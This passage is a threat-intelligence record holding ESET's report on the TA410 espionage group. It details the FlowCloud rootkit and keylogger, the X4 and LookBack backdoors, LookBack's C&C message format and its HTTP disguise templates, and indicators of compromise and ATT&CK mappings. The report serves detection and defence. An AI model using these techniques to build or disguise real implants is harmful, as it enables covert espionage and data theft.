^ key) + key) \u0026 0xFF\r\nFigure 16. 
Pseudocode for the DLL decryption routine\r\nThis newly loaded module uses the same anti-debugging and anti-analysis techniques as the hijacking DLL described above.\r\nOn top of those, it also uses a few tricks of its own:\r\nCovers its tracks by overwriting the code previously modified by the malicious library with a useless call to lstrlenW.\r\nBase64-encoded strings are used for function imports (via GetProcAddress) and only decoded as needed.\r\nExits if the process’s executable is not the expected DLL hijacking target (e.g., setlang.exe).\r\nThe module creates a new process using the same executable and performs process injection on it, redirecting the existing\r\nthread to the written code region. This code inside the new process launches a thread that decrypts and loads the fcClient\r\nmodule before calling its startModule export. That function will perform the final stages of the installation and load the DLL\r\ncontaining the backdoor functionality.\r\nDriver (hidmouse.sys)\r\nFlowCloud’s driver serves a dual purpose: it acts as both a keylogger and a rootkit. It accomplishes this mainly by hijacking\r\nnative drivers’ handler functions for specific I/O control codes and replacing them with its own:\r\nRead (IRP_MJ_READ) for the keyboard driver (kbdclass or KeyboardClass0)\r\nRead (IRP_MJ_READ) for the mouse driver (mouclass or PointerClass0)\r\nDevice control (IRP_MJ_DEVICE_CONTROL) for the network driver (tcpip or nsiproxy)\r\nThe driver also provides kernel-level functionalities to be used by the RAT. They can be invoked via I/O control codes or by\r\nwriting to specific registry keys.\r\nThis module is signed with a certificate with the thumbprint 02ED6A578C575C8D9C72398E790354B095BB07BC. Issued\r\nto Hangzhou Leishite Laser Technology Co. 
in 2012 by Wosign and revoked in 2014, it seems most likely this certificate\r\nwas stolen.\r\nKeylogging\r\nIn its IRP_MJ_READ handlers for keyboard and mouse events, the driver simply records IO events to lookaside lists before\r\npassing them to the legitimate handler. This ensures that the driver doesn’t interfere in a way that could be noticeable by the\r\nuser. These events are then parsed to the format used by the backdoor’s keymouse_manager and written to the named pipe\r\n\\\\.\\pipe\\namedpipe_keymousespy_english.\r\nRootkit\r\nAfter hijacking the aforementioned drivers, the rootkit erases the DLL names associated with them from internal structures\r\nused to display device drivers.\r\nThe rootkit can prevent processes from being shown by utilities that list running processes, such as Task Manager. As shown\r\nin Figure 17, it achieves this by removing their entries from the ActiveProcessLinks list of the undocumented KPROCESS\r\nkernel structure. Since this structure is not part of the public API and can change between releases, the rootkit contains code\r\nto match the operating system’s build number to the correct offsets in this structure. That code covers all versions from\r\nWindows XP to Windows 10 20H1. This functionality can be invoked on any process via the\r\nIOCTL_HIDE_PROCESS_BY_PROCESSID (0x222028) control code. It is also used, on driver startup, to hide the process\r\nwith the PID contained in the registry key HKLM\\HARDWARE\\{76BA14B7-AF0C-4dc9-9E9D-2A6970F231D9}. This\r\nprocess is further camouflaged by changing its associated executable filename to one of svchost.exe or dllhost.exe in the\r\nsame kernel structure.\r\nFigure 17. 
Function used to prevent a process from being displayed in lists of running processes\r\nThrough its hijacking of the network driver, the rootkit can also hide a single process’s network traffic from local utilities.\r\nThe process whose traffic is to be hidden is set through the IOCTL_SET_TRAFFICHIDE_PROCESSID (0x222048) control\r\ncode.\r\nSome of the rootkit’s functions are used by the fcClientDll module to hide the process in which it is running.\r\nControl codes to manipulate a process name in various internal structures are also exposed by the driver.\r\nPersistence module (fcClientWD)\r\nThis module is relatively simple compared to other components. The previously mentioned NetTask already accomplishes\r\npersistence in most cases, by executing on system startup. This module complements that mechanism by ensuring\r\npersistence in a very specific edge case where execution of the malware might be interrupted: the user logs out on a system\r\nwith hibernation and Fastboot enabled. On systems where either of those is disabled, this module does nothing.\r\nFlowCloud v4.1.3\r\nThis older version of FlowCloud has already been described in a Proofpoint blogpost and presents similarities to the newer\r\nversion described in the preceding subsections, so we will only highlight notable differences and new information revealed\r\nby our analysis.\r\nThis version runs multiple anti-analysis and anti-detection checks before executing its payload, and terminates if any of\r\nthose tests detect that the process is being analyzed. It checks running processes for executables of several known\r\ncybersecurity vendors. While most of these names are also present in version 5, this list is not a strict subset of the one v.5\r\nuses. This tends to support the proposition that versions 4 and 5 of FlowCloud are maintained in parallel.\r\nIt also embeds a DLL version of the Pafish (aka Paranoid Fish) sandbox and analysis detection tool as one of its encrypted\r\nresources. 
This library is loaded in memory and all of the anti-analysis/anti-sandboxing checks it implements are run.\r\nInterestingly, the driver installed is the same as the one for version 5.0.2. Those used by version 5.0.3 provide identical\r\nfunctionality, but differ slightly.\r\nTA410 – LookingFrog\r\nLookingFrog uses two main malware families: X4 and LookBack. We have seen both of them on machines belonging to the\r\nsame victim.\r\nX4\r\nX4 is a custom backdoor that is used as a first stage, before LookBack is deployed. It is loaded by a VMProtect-ed loader,\r\nusually named PortableDeviceApi.dll or WptsExtensions.dll. Unfortunately, we were not able to uncover any persistence\r\nmethod.\r\nThe loader injects an orchestrator into memory in a svchost.exe process. In turn, the orchestrator injects the network\r\ncomponent into memory and communicates with it via a file located at\r\nC:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\Log\\rsa.txt. Figure 18 shows a summary of the X4 components.\r\nFigure 18. Summary of the X4 components\r\nThe network component is shellcode. It is encrypted using the AES algorithm and stored in the Windows registry. Table 2\r\nshows the three registry keys used by X4.\r\nTable 2. Network shellcode registry keys\r\nRegistry Key | Description\r\nHKLM\\SOFTWARE\\Microsoft\\DRM\\X4Key | AES key.\r\nHKLM\\SOFTWARE\\Microsoft\\DRM\\PSKey | Name of the process into which the shellcode will be injected (spoolsv.exe).\r\nHKLM\\SOFTWARE\\Microsoft\\DRM\\X4Data | Encrypted shellcode.\r\nThe decrypted shellcode looks like it was based on Metasploit and communicates with a hardcoded IP address via HTTP. 
An\r\ninteresting characteristic is that it uses the fake Host header onedrive.live.com.\r\nEvery second, the orchestrator, which lives in memory only, reads the cleartext rsa.txt file to check whether there are new\r\ncommands to execute. The commands are received from the C\u0026C server, via the network shellcode. In the orchestrator, the\r\ncommands are identified by a numerical identifier that is computed from the command name, as shown in Figure 19.\r\nFigure 19. Custom hash function seen in X4\r\nThe orchestrator handles seven commands, detailed in Table 3. Output of these commands is written to\r\nC:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\Log\\output.log.\r\nTable 3. X4 backdoor commands\r\nID | Name | Description\r\n0x3ECFF9B9D92 | osload | Write new encrypted shellcode to HKLM\\SOFTWARE\\Microsoft\\DRM\\X4Data. It can also modify X4Key and PSKey.\r\n0x3F5FAFC0EDD | pskill | Kill a process by PID.\r\n0x3F5FB1E6015 | pslist | List the running processes using CreateToolhelp32Snapshot and Process32Next.\r\n0x3B6C27610D1 | inject | Decrypt and inject shellcode, from encrypted form on disk, into memory.\r\n0xDA83E71 | exec | Execute a given command line.\r\n0xE9478DC | live | Get the PID of the process in which the orchestrator is running.\r\n0x6D6E70D40 | cacls | Modify the access controls of a given object using SetEntriesInAclA, SetNamedSecurityInfoA, and BuildExplicitAccessWithName.\r\nX4 provides basic functionalities to control the machine remotely, but it lacks more advanced spying capabilities.\r\nLookBack\r\nThe LookBack backdoor has previously been described by Proofpoint; we are therefore providing a quick summary and our\r\nanalysis of the custom network protocol.\r\nBackdoor\r\nIn all samples we observed, the LookBack loader is a legitimate version of libcurl.dll with the curl_share_init (ordinal #52)\r\nexport modified to 
load the SodomNormal communications module. This corroborates the observation by Proofpoint\r\nresearchers. This module is embedded in the library’s resource section and encrypted with an algorithm similar to RC4. The\r\nencryption/decryption function, shown in Figure 20, always uses the same key.\r\nFigure 20. Decompiled view of the function used to encrypt and decrypt the embedded module\r\nThe SodomNormal component tries to read configuration information from a sodom.ini file. This configuration file is\r\nencrypted using the just-described function and starts with the magic bytes 0xAF1324BC. If this file is unavailable or\r\ninvalid, a hardcoded default configuration is used.\r\nA unique victim ID is then generated from the victim’s CPUID, username, and IP address. This is sent to the server along\r\nwith the computer’s name and the configuration data. The communications module then downloads the main backdoor\r\nmodule, named SodomMain, from the C\u0026C server. Unfortunately, we couldn’t obtain this module.\r\nCommunication protocol\r\nLookBack can communicate over HTTP or via its “normal protocol”. In either case, the data being transferred is the same.\r\nLookBack’s normal protocol uses raw TCP sockets and a custom message format described in Table 4. This message is\r\ncomposed of eight header fields, followed by a body of variable length. The message body is encrypted with the function\r\npreviously described for the SodomNormal resource in the loader (Figure 20). The encrypted data is then compressed with\r\nthe deflate algorithm via the compress function of the statically linked zlib.\r\nTable 4. LookBack message format\r\nField | Offset (bytes) | Note\r\nMagic bytes | 0x00 | The constant 0x48AB2EC2. Messages that don’t start with this magic value are discarded.\r\n\u003cMessage dependent\u003e | 0x04 |\r\nCompressed body size | 0x08 |\r\nUncompressed body size | 0x0C |\r\nChecksum | 0x10 | CRC32 of the message body.\r\nMessage type | 0x14 | Integer value indicating the message’s content and the associated action to be performed. We have found code for over 50 message types. There seems to be little to no overlap between the values used by the client and the server. Table 5 presents the types we have analyzed in more depth.\r\n\u003cMessage dependent\u003e | 0x18 |\r\n\u003cMessage dependent\u003e | 0x1C |\r\nMessage Body | 0x20 | The message body can be empty. In this case, the checksum and length fields are set to 0x00.\r\nTable 5. LookBack message types\r\nMessage type | Used by | Description\r\n2 | Client | Register with C\u0026C server. The body contains configuration and information about the victim host.\r\n3 | Server | Acknowledgment for message type 2.\r\n8 | Client | Request to download the main backdoor component (SodomMain).\r\n9 | Server | Reply to message type 8. The message body contains the SodomMain file.\r\n36 and 38 | Client | Transfer file to server in message body.\r\n35 and 37 | Server | Response to message 36 or 38.\r\n41 | Client | Request file from server.\r\n42 | Server | Transfer file to client in message body (response to message 41).\r\nThe HTTP protocol uses the message format detailed in the previous paragraph, but it adds a few extra steps to disguise its\r\ntraffic as legitimate HTTP. It uses a pair of hardcoded templates, one for client requests and another for server responses.\r\nThe fields required for HTTP, such as content length, address, and port number, are filled in with the correct values; useless\r\ndata is used for the others.\r\nFor client requests, the messages are encoded with a modified hexadecimal algorithm that uses the encoding alphabet a-p\r\ninstead of the conventional 0-9a-f. 
This provides some obfuscation and ensures that messages will not contain binary data or\r\nbe obviously hex encoded, both of which could look suspicious in an application/x-www-form-urlencoded message. The\r\nrequest’s body is composed of this encoded value prefixed with the hardcoded string id=1\u0026op=report\u0026status=. Client\r\nrequest and server response templates are shown in Figure 21 and Figure 22 respectively, with the template fields in angle\r\nbrackets.\r\nPOST \u003cC\u0026C address + port\u003e/status.php?r=\u003cepoch timestamp\u003e\u003crandom 16-bit int\u003e HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nAccept-Language: en-us\r\nUser-Agent: \u003creturn value of ObtainUserAgentString OR \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geck\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nHost: \u003cC\u0026C url\u003e\r\nContent-Length: \u003ccontent length\u003e\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nid=1\u0026op=report\u0026status=\u003cencoded LookBack message\u003e\r\nFigure 21. Template used for HTTP client requests\r\nOn the server side, the data described in the previous section is sent directly as binary data in the body with a header that\r\npurports that the data is a GIF image.\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.12.2\r\nDate: \u003ccurrent time\u003e GMT\r\nLast-Modified: \u003ccurrent time - 100 seconds\u003e GMT\r\nETag: \u003c3 random 16-bit ints\u003e\r\nAccept-Ranges: bytes\r\nContent-Length: \u003ccontent length\u003e\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: image/gif\r\n\u003cLookBack message\u003e\r\nFigure 22. 
Template used for HTTP server responses\r\nTA410 – JollyFrog\r\nThis third team uses off-the-shelf malware from the known malware families QuasarRAT and Korplug (aka PlugX).\r\nJollyFrog mostly aligns with what was described by Fortinet as APT10.\r\nKorplug\r\nKorplug, also known as PlugX, is a backdoor that has been used for years by many different cyberespionage groups. Despite\r\nbeing well known, it is still in use and we have observed TA410 using it as recently as in April 2021.\r\nIn the case of TA410, Korplug arrives as a RARSFX archive, generally named m.exe, containing three files:\r\nqrt.dll: A custom loader.\r\nqrtfix.exe: A legitimate signed application from F-Secure, vulnerable to DLL search-order hijacking.\r\nqrt.dll.usb: The Korplug shellcode.\r\nThe loader allocates memory using VirtualAlloc and copies the content of qrt.dll.usb there. Then it jumps right into the\r\nshellcode that will decompress and load the Korplug payload.\r\nQuasarRAT\r\nQuasarRAT is a full-featured backdoor freely available on GitHub. It is used by numerous threat actors who perform\r\ncyberespionage or cybercrime.\r\nTA410 uses a custom downloader and a custom loader written in .NET, which are convenient for identifying their instances\r\nof QuasarRAT among all the noise created by other attackers.\r\nNamed sll.exe, this downloader is digitally signed with the certificate seen in Figure 23. The certificate is likely stolen and\r\nbelongs to 北京和赢讯时科技有限公司 (translated: Beijing Heyingxunshi Technology Co., Ltd.) with thumbprint\r\n850821D88A4475F0310F10FBA806353A4113D252. Although the certificate has now been revoked, it was still valid when\r\nthis sample was signed on August 10th, 2020.\r\nFigure 23. 
Digital signature of the QuasarRAT downloader\r\nThis downloader simply downloads the loader and encrypted QuasarRAT payload from the hardcoded C\u0026C server\r\nhttp://ffca.caibi379[.]com, at /rwjh/new/. This server was previously linked to FlowCloud (FlowingFrog). The loader is\r\nnamed PresentationCache.exe and is protected with DNGuard, a commercial .NET packer. It is also signed with the same\r\ncertificate as the downloader. It decrypts and loads the final QuasarRAT payload, which uses cahe.microsofts[.]org as its\r\nC\u0026C server.\r\nConclusion\r\nTA410 is a cyberespionage umbrella targeting high-profile entities such as governments and universities worldwide. ESET\r\nis revealing its latest findings about this group, including results from ongoing research, during Botconf 2022.\r\nInitial access to targets is obtained by exploiting vulnerable internet-facing applications such as Microsoft Exchange, or by\r\nsending spearphishing emails with malicious attachments such as RTF documents created via the Royal Road builder. Even\r\nthough the JollyFrog team uses generic tools, FlowingFrog and LookingFrog have access to complex implants such as\r\nFlowCloud and LookBack. YARA and Snort rules for these implants are available in ESET's GitHub repository.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research now also offers private APT intelligence reports and data feeds. 
For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nFiles\r\nSHA-1 Filename Detection Description\r\nC96558312FBF5847351B0B6F724D7B3A31CCAF03 N/A Win32/Agent.UWR FlowCloud v5.0.3 ini\r\n1403241C415A8D686B1148FA4229A2EB833D8D08 setlangloc.dll Win32/Agent.UNL FlowCloud DLL hijac\r\n38D0E92AFF991CFC9C68D7BAAD6CB85916139AF5 hidmouse.sys Win32/Agent.UKR TA410 32-bit Rootkit\r\nAF978ED8AD37CE1437A6B42D96BF518D5C4CFD19 hidmouse.sys Win64/Agent.UKR TA410 64-bit Rootkit\r\nB70F3A3A9B5B8506EE95791469CA496E01AD7DAF winver32.dll Win32/Agent.ULH FlowCloud v4.1.3 hcC\r\n014421BDB1EA105A6DF0C27FC114819FF3637704 hhh.exe Win32/Agent.ABYK FlowCloud v4.1.3 ini\r\nEA298866E5A61FEEA4D062987F23B10A78C8A4CA N/A Win32/Agent.ULH FlowCloud v4.1.3 bac\r\n021B9E2E8AA30B29569254C0378A9F43E4F32EEC winver64.dll Win64/Agent.KM FlowCloud v4.1.3 hcC\r\n2A2F08FAD6B0A86DC94885224687D954E739CC21 N/A Win32/ParanoidFish.A Pafish sandbox detect\r\n3658B7CCA13C8C8AD03E9B6AEFE4B9CBE48E3C81 hidmouse.sys Win64/Agent.UKR TA410 Rootkit/Keylo\r\n517488F6BD0E7FC9EDE82F37226A75212B277E21 hidmouse.sys Win64/Agent.UKR TA410 Rootkit/Keylo\r\nC05B4AD7A3322917E17710842FB88A090198D51F N/A Win32/Agent.TWI LookBack trojanized\r\nDB2DF1BDF8145CB8ABA3A2026A3CC3EF4F1762BE phx.dll Win32/Agent.TWI LookBack trojanized\r\nEDE2AB811311FC011B1E89C5A0B7A60C123B7398 hidmouse.sys Win64/Agent.UKR TA410 Rootkit/Keylo\r\n7AA35BA7030AFCD271436DE8173D7B2F317A1BFC libcurl.dll Win32/Agent.TWI LookBack trojanized\r\nA5C02ABE698300F3DE0B7CC7F0856652753831DA libcurl.dll Win32/Agent.TWI LookBack trojanized\r\n613C4AFAE8F5F80F22DCD1827E3230FCA361ADA5 libcurl.dll Win32/Agent.UKD LookBack trojanized\r\n859CD6DFDADAB3D6427C6C1C29581CB2094D648F meterpreter.exe Win32/Rozena.CP Metasploit Meterprete\r\nDBEA7F0C0D2BF8BC365A2D1572CA1538FE8FB9A3 responsor.dat 
Win32/Agent.ULL FlowCloud fcClientD\r\nADD5B4FD9AEA6A38B5A8941286BC9AA4FE23BD20 絆邧坋蔡趕口昴.doc Win32/Exploit.Agent.TY Malicious Royal Roa\r\n7BA42061568FF6D9CA5FE5360DCE74C25EA48ADA N/A Win32/Agent.ACKQ Packed Tendyron dow\r\nD81215890703C48B8EA07A1F50FEC1A6CA9DF88B N/A Win32/TrojanDownloader.Agent.FLI Unpacked Tendyron d\r\nF359D3C074135BBCA9A4C98A6B6544690EDAE93D OnKeyToken_KEB.dll Win32/Injector.ELGA Tendyron malicious D\r\n621B31D5778EC2FB72D38FB61CED110A6844D094 N/A Win64/Rozena.AO X4 network shellcode\r\nBC11DC8D86A457A07CFE46B5F2EF6598B83C8A1F m.exe Win32/Injector.EMVA Korplug dropper.\r\nC369E1466F66744AA0E658588E7CF2C051EE842F qrt.dll Win32/Injector.EMVA Korplug loader.\r\nB868764C46BADC152667E9128375BA4F8D936559 qrt.dll.usb N/A Korplug encrypted pa\r\nBDECA89B4F39E6702CE6CBBC9E6D69F6BBAB01C8 N/A N/A Korplug decrypted pa\r\n5379FBB0E02694C524463FDF7F267A7361ECDD68 sll.exe MSIL/TrojanDownloader.Agent.GPS QuasarRAT download\r\n6CC6170977327541F8185288BB9B1B81F56D3FD0 PresentationCache.exe MSIL/Agent.TZG QuasarRAT loader.\r\nD95185A4A3F8512D92F69D2ED7B8743638C54BE8 N/A MSIL/Spy.Agent.AES QuasarRAT backdoor\r\nBE7F0E41CD514561AED43B07AA9F5F0842BF876C HTra.exe Win32/HackTool.Hucline.AB HUC Packet Transmi\r\n7F663F50E9D6376715AEB3AB66DEDE038258EF6C HTran13.exe Win32/HackTool.Hucline.S HUC Packet Transmi\r\nBEDA1224B3BB9F98F95FF7757D2687F4D9F4B53A event.exe Win32/Agent.UJN\r\nSimple cmd.exe-base\r\nMingW.\r\n2B61E7C63A0A33AAC4CF7FE0CEB462CF6DACC080 htran.exe Win32/HackTool.Hucline.AB HUC Packet Transmi\r\nEF3C796652141B8A68DCCF488159E96903479C29 htran_f-secury.exe Win32/HackTool.Hucline.AB HUC Packet Transmi\r\n6B547C244A3086B5B6EA2B3A0D9594BBE54AE06B inbt.zip Python/HackTool.Agent.J\r\nEXE masquerading a\r\nscanner (compiled wi\r\n4CDCE3AF614C2A5E60E71F1205812AB129C0955B msd017.exe Python/Exploit.MS17-010.B\r\nThis is a Python scann\r\nfor the vulnerability M\r\nCertificates\r\nSerial number 0F8B600FF1882E\r\nThumbprint 
02ED6A578C575C8D9C72398E790354B095BB07BC\r\nSubject CN Hangzhou Leishite Laser Technology Co., Ltd.\r\nSubject O Hangzhou Leishite Laser Technology Co., Ltd.\r\nSubject L Hangzhou\r\nSubject S Zhejiang\r\nSubject C CN\r\nValid from 2012-03-29 09:07:04 UTC\r\nValid to 2014-04-02 06:24:19 UTC\r\nSerial number 4ED8730F4E1B8558CD1CB0107B5F776B\r\nThumbprint 850821D88A4475F0310F10FBA806353A4113D252\r\nSubject CN 北京和赢讯时科技有限公司 (translation: Beijing Heyingxunshi Technology Co., Ltd.)\r\nSubject O 北京和赢讯时科技有限公司 (translation: Beijing Heyingxunshi Technology Co., Ltd.)\r\nSubject OU 研发部 (R\u0026D Department)\r\nSubject S 北京市 (Beijing)\r\nSubject C CN\r\nValid from 2019-11-13 00:00:00 UTC\r\nValid to 2020-11-12 23:59:59 UTC\r\nNetwork\r\nDomain | IP | First seen | Details\r\n | 43.254.216[.]104 | 2020-06 | Delivery server\r\n | 45.124.115[.]103 | 2020-08 | Delivery server\r\n | 161.82.181[.]4 | 2020-12 | Delivery server\r\n | 43.254.219[.]153 | 2020-07 | X4 C\u0026C server\r\n | 154.223.141[.]36 | 2020-06 | HTran C\u0026C server\r\n | 103.139.2[.]93 | 2020-10 | Tendyron C\u0026C server\r\ncahe.microsofts[.]com | | | QuasarRAT C\u0026C server\r\nffca.caibi379[.]com | | | QuasarRAT downloader C\u0026C server\r\nsmtp.nsfwgo[.]com | | | Korplug C\u0026C server\r\n | 45.124.115[.]103 | 2020-06 | LookBack C\u0026C server\r\n | 185.225.19[.]17 | 2021-01 | LookBack C\u0026C server\r\n | 94.158.245[.]249 | 2020-03 | LookBack C\u0026C server\r\n | 5.252.179[.]227 | 2021-03 | LookBack C\u0026C server\r\n | 222.186.151[.]141 | 2019-11 | FlowCloud C\u0026C server\r\n | 47.111.22[.]65 | 2020-09 | FlowCross C\u0026C server\r\n | 114.55.109[.]199 | 2020-05 | FlowCloud C\u0026C server\r\ndlaxpcmghd[.]com | 185.225.17[.]39 | 2020-09 | LookBack C\u0026C server\r\nwwww.dlmum[.]com | N/A | | FlowCloud C\u0026C server\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 9 of the MITRE ATT\u0026CK framework.\r\nTactic | ID | Name | 
Description\r\nResource Development | T1587.001 | Develop Capabilities: Malware | TA410 develops LookBack and FlowCloud.\r\n | T1588.003 | Obtain Capabilities: Code Signing Certificates | TA410 uses stolen code-signing certificates.\r\n | T1588.005 | Obtain Capabilities: Exploits | TA410 had exploits for ProxyLogon and ProxyShell.\r\nInitial Access | T1190 | Exploit Public-Facing Application | TA410 has exploited web server vulnerabilities for initial access.\r\n | T1566.001 | Phishing: Spearphishing Attachment | TA410 uses malicious RTF and DOCX attachments to compromise victims.\r\nExecution | T1106 | Native API | FlowCloud makes extensive use of the Windows API to execute commands and launch processes.\r\n | T1129 | Shared Modules | TA410’s backdoors can load DLLs and execute their payloads.\r\n | T1203 | Exploitation for Client Execution | TA410 uses Royal Road RTF documents to compromise victims.\r\n | T1559.001 | Inter-Process Communication: Component Object Model | FlowCloud uses COM interfaces to schedule tasks and perform WMI queries.\r\n | T1047 | Windows Management Instrumentation | TA410 uses WMI for lateral movement and information gathering.\r\nPersistence | T1053.005 | Scheduled Task/Job: Scheduled Task | FlowCloud creates a scheduled task for persistence.\r\n | T1505.003 | Server Software Component: Web Shell | TA410 plants webshells on vulnerable web servers.\r\n | T1543.003 | Create or Modify System Process: Windows Service | FlowCloud can be configured to create a service for persistence.\r\nDefense Evasion | T1027 | Obfuscated Files or Information | FlowCloud files are distributed and stored in encrypted form.\r\n | T1036.004 | Masquerading: Masquerade Task or Service | The driver component of FlowCloud masquerades as 
a mouse driver service.\r\n | T1036.005 | Masquerading: Match Legitimate Name or Location | Files named after legitimate utilities are written into the %ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\ subdirectory.\r\n | T1014 | Rootkit | FlowCloud uses a rootkit to hide its network traffic and processes from system utilities.\r\n | T1055.001 | Process Injection: Dynamic-link Library Injection | FlowCloud uses both regular and reflective DLL injection. It also manually loads some DLLs, bypassing calls to LoadLibrary.\r\n | T1055 | Process Injection | TA410’s backdoors perform process injection to masquerade as harmless processes.\r\n | T1055.003 | Process Injection: Thread Execution Hijacking | One of FlowCloud’s DLLs replaces instructions in the loading process to make it execute code written in its memory.\r\n | T1055.012 | Process Injection: Process Hollowing | FlowCloud uses module stomping to hide the loading of its main backdoor.\r\n | T1140 | Deobfuscate/Decode Files or Information | Multiple TA410 backdoors communicate with their C\u0026C through encrypted and obfuscated channels.\r\n | T1574.002 | Hijack Execution Flow: DLL Side-Loading | FlowCloud uses DLL Side-Loading to launch its second-stage dropper.\r\n | T1497 | Virtualization/Sandbox Evasion | Some versions of FlowCloud use the Pafish utility to detect virtualization, sandboxes, and debuggers.\r\n | T1134.002 | Access Token Manipulation: Create Process with Token | FlowCloud can create processes using tokens acquired from legitimate processes.\r\n | T1070.004 | Indicator Removal on Host: File Deletion | FlowCloud deletes its rootkit’s executable after launching it.\r\n | T1070.006 | Indicator Removal on Host: Timestomp | FlowCloud backdates some files and services to 
2013.\r\nDiscovery\r\nT1010\r\nApplication Window\r\nDiscovery\r\nWhen logging mouse events, FlowCloud gathers information\r\nabout the application running in the foreground.\r\nT1057 Process Discovery Multiple TA410 backdoors can list running processes.\r\nT1518 Software Discovery\r\nFlowCloud uses the IShellAppManager COM object to list\r\ninstalled software.\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nFlowCloud can search through connected file systems and\r\nobtain directory listings.\r\nT1120\r\nPeripheral Device\r\nDiscovery\r\nFlowCloud can list connected camera devices.\r\nT1016\r\nSystem Network\r\nConfiguration\r\nDiscovery\r\nFlowCloud can discover and use locally configured proxies.\r\nT1012 Query Registry FlowCloud components use registry keys to signal each other.\r\nT1115 Clipboard Data\r\nFlowCloud registers a listener to steal clipboard data when it is\r\nchanged.\r\nCollection T1056 Input Capture FlowCloud logs mouse clicks.\r\nT1056.001\r\nInput Capture:\r\nKeylogging\r\nFlowCloud records keystrokes.\r\nT1113 Screen Capture FlowCloud takes screenshots at regular intervals.\r\nT1125 Video Capture\r\nFlowCloud uses OpenCV to take pictures using connected\r\ncamera devices.\r\nT1123 Audio Capture FlowCloud has audio capture functionality.\r\nT1119 Automated Collection\r\nFlowCloud automatically collects data based on timers and\r\nevents.\r\nT1074.001\r\nData Staged: Local\r\nData Staging\r\nFlowCloud stores collected data in local SQLite databases prior\r\nto exfiltration.\r\nT1005\r\nData from Local\r\nSystem\r\nFlowCloud can exfiltrate files from local file systems.\r\nT1025\r\nData from Removable\r\nMedia\r\nFlowCloud can exfiltrate files from removable drives.\r\nT1560.002\r\nArchive Collected\r\nData: Archive via\r\nLibrary\r\nFlowCloud and LookBack use a statically linked zlib library to\r\ncompress data.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 25 of 26\n\nTactic ID Name 
Description\r\nT1560.003\r\nArchive Collected\r\nData: Archive via\r\nCustom Method\r\nFlowCloud compresses some collected data by removing\r\nduplicates and similar screen captures.\r\nCommand\r\nAnd Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web\r\nProtocols\r\nLookBack and FlowCloud can send and receive data over\r\nHTTP.\r\nT1095\r\nNon-Application\r\nLayer Protocol\r\nLookBack can communicate over raw TCP sockets.\r\nT1132.001\r\nData Encoding:\r\nStandard Encoding\r\nFlowCloud uses Protobuf to encode C\u0026C commands and\r\nconfiguration.\r\nT1132.002\r\nData Encoding: Non-Standard EncodingLookBack encodes binary data using a custom hex-encoding\r\nmethod.\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric\r\nCryptography\r\nFlowCloud can use XOR, TEA, RC4 and a modified AES\r\nalgorithm to encrypt traffic and files.\r\nExfiltration T1030\r\nData Transfer Size\r\nLimits\r\nFlowCloud uses local caches to stage data and exfiltrates their\r\ncontent when it reaches a size specified in its configuration.\r\nImpact T1529\r\nSystem\r\nShutdown/Reboot\r\nFlowCloud can force a system crash or shutdown.\r\nSource: https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 26 of 26",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/"
	],
	"report_names": [
		"lookback-ta410-umbrella-cyberespionage-ttps-activity"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ec14074c-8517-40e1-b4d7-3897f1254487",
			"created_at": "2023-01-06T13:46:38.300905Z",
			"updated_at": "2026-04-10T02:00:02.918468Z",
			"deleted_at": null,
			"main_name": "APT10",
			"aliases": [
				"Red Apollo",
				"HOGFISH",
				"BRONZE RIVERSIDE",
				"G0045",
				"TA429",
				"Purple Typhoon",
				"STONE PANDA",
				"Menupass Team",
				"happyyongzi",
				"CVNX",
				"Cloud Hopper",
				"ATK41",
				"Granite Taurus",
				"POTASSIUM"
			],
			"source_name": "MISPGALAXY:APT10",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "faa4a29b-254a-45bd-b412-9a1cbddbd5e3",
			"created_at": "2022-10-25T16:07:23.80111Z",
			"updated_at": "2026-04-10T02:00:04.753677Z",
			"deleted_at": null,
			"main_name": "LookBack",
			"aliases": [
				"FlowingFrog",
				"LookBack",
				"LookingFrog",
				"TA410",
				"Witchetty"
			],
			"source_name": "ETDA:LookBack",
			"tools": [
				"FlowCloud",
				"GUP Proxy Tool",
				"SodomMain",
				"SodomMain RAT",
				"SodomNormal"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9ffcbb0c-7a0f-419f-a174-f18a02ce47f1",
			"created_at": "2023-01-06T13:46:39.059774Z",
			"updated_at": "2026-04-10T02:00:03.199867Z",
			"deleted_at": null,
			"main_name": "TA410",
			"aliases": [],
			"source_name": "MISPGALAXY:TA410",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3e8f802c-efba-45ff-8844-5ea4e4a5297d",
			"created_at": "2023-11-07T02:00:07.092751Z",
			"updated_at": "2026-04-10T02:00:03.404589Z",
			"deleted_at": null,
			"main_name": "Witchetty",
			"aliases": [
				"LookingFrog"
